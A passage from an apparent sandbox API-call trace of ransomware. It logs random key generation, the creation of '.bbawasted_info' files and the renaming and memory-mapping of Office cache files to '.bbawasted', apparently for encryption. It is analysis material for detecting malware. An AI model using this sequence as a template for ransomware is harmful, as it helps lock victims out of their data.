(lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0067.958] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5bf6a8 [0067.959] lstrcpyW (in: lpString1=0x5bf746, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0067.959] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c75e0 [0067.959] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5bee70) returned 1 [0067.959] CryptGenRandom (in: hProv=0x5bee70, dwLen=0xa3a, pbBuffer=0x5c75e0 | out: pbBuffer=0x5c75e0) returned 1 [0067.959] CryptReleaseContext (hProv=0x5bee70, dwFlags=0x0) returned 1 [0067.959] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0067.960] WriteFile (in: hFile=0x110, lpBuffer=0x5c75e0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c75e0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0067.961] SetEndOfFile (hFile=0x110) returned 1 [0067.961] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.961] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c75e0 | out: hHeap=0x580000) returned 1 [0067.961] lstrcpyW (in: lpString1=0x5bf746, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0067.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.bbawasted")) returned 1 [0067.986] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0067.987] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0067.987] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x91975 [0067.987] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x11a0000 [0067.987] CloseHandle (hObject=0x114) returned 1 [0068.012] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5b93b0) returned 1 [0068.013] CryptGenRandom (in: hProv=0x5b93b0, dwLen=0x1b8, pbBuffer=0x5d2df0 | out: pbBuffer=0x5d2df0) returned 1 [0068.013] CryptReleaseContext (hProv=0x5b93b0, dwFlags=0x0) returned 1 [0068.013] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5b93b0) returned 1 [0068.014] CryptGenRandom (in: hProv=0x5b93b0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.014] CryptReleaseContext (hProv=0x5b93b0, dwFlags=0x0) returned 1 [0068.022] SetEndOfFile (hFile=0x110) returned 1 [0068.025] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cba00 | out: hHeap=0x580000) returned 1 [0068.025] CloseHandle (hObject=0x110) returned 1 [0068.026] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.026] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c01d0 | out: hHeap=0x580000) returned 1 [0068.026] _aulldvrm () returned 0x0 [0068.026] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5b93b0) returned 1 [0068.027] CryptGenRandom (in: hProv=0x5b93b0, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.027] CryptReleaseContext (hProv=0x5b93b0, dwFlags=0x0) returned 1 [0068.027] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0068.027] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c6) returned 0x5c8290 [0068.027] lstrcpyW (in: lpString1=0x5c834c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.027] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5cb5f0 [0068.027] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5c8560) returned 1 [0068.028] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5cb5f0 | out: pbBuffer=0x5cb5f0) returned 1 [0068.028] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0068.028] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.029] WriteFile (in: hFile=0x110, lpBuffer=0x5cb5f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5cb5f0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.029] SetEndOfFile (hFile=0x110) returned 1 [0068.032] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.032] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb5f0 | out: hHeap=0x580000) returned 1 [0068.032] lstrcpyW (in: lpString1=0x5c834c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.bbawasted")) returned 1 [0068.266] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.266] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.266] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x741 [0068.267] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x741) returned 0x570000 [0068.267] CloseHandle (hObject=0x118) returned 1 [0068.269] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5be8c0) returned 1 [0068.270] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x1b8, pbBuffer=0x5c77f8 | out: pbBuffer=0x5c77f8) returned 1 [0068.270] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.270] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5be8c0) returned 1 [0068.270] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.270] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.279] SetEndOfFile (hFile=0x110) returned 1 [0068.281] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9040 | out: hHeap=0x580000) returned 1 [0068.281] CloseHandle (hObject=0x110) returned 1 [0068.282] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8290 | out: hHeap=0x580000) returned 1 [0068.282] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c02c8 | out: hHeap=0x580000) returned 1 [0068.282] _aulldvrm () returned 0x0 [0068.282] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5be8c0) returned 1 [0068.283] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.283] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.283] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0068.283] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5c77b0 [0068.283] lstrcpyW (in: lpString1=0x5c7850, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.283] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c8c30 [0068.283] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5be8c0) returned 1 [0068.287] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0xa3a, pbBuffer=0x5c8c30 | out: pbBuffer=0x5c8c30) returned 1 [0068.287] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.287] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.288] WriteFile (in: hFile=0x110, lpBuffer=0x5c8c30*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c8c30*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.289] SetEndOfFile (hFile=0x110) returned 1 [0068.289] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.289] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8c30 | out: hHeap=0x580000) returned 1 [0068.289] lstrcpyW (in: lpString1=0x5c7850, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.bbawasted")) returned 1 [0068.289] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0068.290] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0068.290] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x15b5 [0068.290] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15b5) returned 0x570000 [0068.290] CloseHandle (hObject=0x114) returned 1 [0068.292] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5be8c0) returned 1 [0068.293] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x1b8, pbBuffer=0x5c8c78 | out: pbBuffer=0x5c8c78) returned 1 [0068.293] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.293] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5be8c0) returned 1 [0068.294] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.294] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.302] SetEndOfFile (hFile=0x110) returned 1 [0068.304] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb5f0 | out: hHeap=0x580000) returned 1 [0068.304] CloseHandle (hObject=0x110) returned 1 [0068.305] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.306] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0550 | out: hHeap=0x580000) returned 1 [0068.306] _aulldvrm () returned 0x0 [0068.306] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5be8c0) returned 1 [0068.306] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.306] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.306] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0068.306] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b0) returned 0x5c77b0 [0068.307] lstrcpyW (in: lpString1=0x5c7856, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.307] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5cb5f0 [0068.307] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5be8c0) returned 1 [0068.307] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0xa3a, pbBuffer=0x5cb5f0 | out: pbBuffer=0x5cb5f0) returned 1 [0068.307] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.307] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.308] WriteFile (in: hFile=0x110, lpBuffer=0x5cb5f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5cb5f0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.309] SetEndOfFile (hFile=0x110) returned 1 [0068.309] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.309] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb5f0 | out: hHeap=0x580000) returned 1 [0068.309] lstrcpyW (in: lpString1=0x5c7856, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.bbawasted")) returned 1 [0068.310] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.310] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.310] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x333 [0068.310] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x570000 [0068.310] CloseHandle (hObject=0x118) returned 1 [0068.312] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5be8c0) returned 1 [0068.313] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x1b8, pbBuffer=0x5cb638 | out: pbBuffer=0x5cb638) returned 1 [0068.313] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.313] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5be8c0) returned 1 [0068.314] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.314] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.322] SetEndOfFile (hFile=0x110) returned 1 [0068.324] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8c30 | out: hHeap=0x580000) returned 1 [0068.324] CloseHandle (hObject=0x110) returned 1 [0068.326] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.326] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0950 | out: hHeap=0x580000) returned 1 [0068.326] _aulldvrm () returned 0x0 [0068.326] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5be8c0) returned 1 [0068.327] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.327] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.327] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0068.327] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5c77b0 [0068.327] lstrcpyW (in: lpString1=0x5c784a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.327] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c8c30 [0068.327] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5be8c0) returned 1 [0068.328] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0xa3a, pbBuffer=0x5c8c30 | out: pbBuffer=0x5c8c30) returned 1 [0068.328] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.328] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.328] WriteFile (in: hFile=0x110, lpBuffer=0x5c8c30*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c8c30*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.329] SetEndOfFile (hFile=0x110) returned 1 [0068.329] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.329] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8c30 | out: hHeap=0x580000) returned 1 [0068.329] lstrcpyW (in: lpString1=0x5c784a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.bbawasted")) returned 1 [0068.339] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0068.339] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0068.339] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x6a3b [0068.339] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a3b) returned 0x570000 [0068.339] CloseHandle (hObject=0x114) returned 1 [0068.342] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5be8c0) returned 1 [0068.343] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x1b8, pbBuffer=0x5cb9d8 | out: pbBuffer=0x5cb9d8) returned 1 [0068.343] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.343] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5be8c0) returned 1 [0068.344] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.344] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.352] SetEndOfFile (hFile=0x110) returned 1 [0068.354] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c8c30 | out: hHeap=0x580000) returned 1 [0068.354] CloseHandle (hObject=0x110) returned 1 [0068.355] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.355] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c03e0 | out: hHeap=0x580000) returned 1 [0068.355] _aulldvrm () returned 0x0 [0068.355] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5be8c0) returned 1 [0068.356] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.356] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.356] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0068.356] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5c77b0 [0068.356] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.356] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5cb990 [0068.356] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5be8c0) returned 1 [0068.357] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0xa3a, pbBuffer=0x5cb990 | out: pbBuffer=0x5cb990) returned 1 [0068.357] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.357] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.bbawasted_info" (normalized: "c:\\msocache\\all 